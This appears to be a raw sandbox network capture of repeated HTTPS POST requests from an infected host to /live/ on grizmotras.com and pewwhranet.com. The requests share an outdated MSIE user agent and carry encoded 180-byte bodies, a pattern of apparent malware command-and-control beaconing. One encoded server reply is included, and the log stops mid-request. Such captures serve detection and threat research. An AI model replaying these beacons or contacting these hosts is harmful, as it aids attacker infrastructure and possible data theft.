                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                77192.168.2.549800172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:29 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:29 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                78192.168.2.549801104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:33 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:33 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                79192.168.2.549802172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:37 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:37 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:21:41 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:21:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UlP1UiPxwBFkOn%2F1PYQj6UyPfHIPLhNSk%2FA7swH64WCQL%2FieEACkCB%2ByUHNgqByoRbbr5bWB9PyvdSdpvd7ei8V8zVVBxIGmcV3PPsq3%2FtGH11DhSFnwcqV68Itfp25N%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99fa439202588-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:21:41 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:21:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                80192.168.2.549803172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:42 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:42 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                81192.168.2.549804104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:46 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:46 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                82192.168.2.549805172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:50 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:50 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                83192.168.2.549806104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:55 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:55 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                84192.168.2.549807172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:59 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:59 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                85192.168.2.549808104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:03 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:03 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                86192.168.2.549809172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:08 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:08 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                87192.168.2.549810104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:12 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:12 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                88192.168.2.549811172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:16 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:16 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                89192.168.2.549812104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:20 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:20 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                90192.168.2.549813172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:25 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:25 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                91192.168.2.549814104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:29 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:29 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                92192.168.2.549815172.67.219.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:33 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:33 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                93192.168.2.549816104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:22:37 UTC227OUTPOST /live/ HTTP/1.1
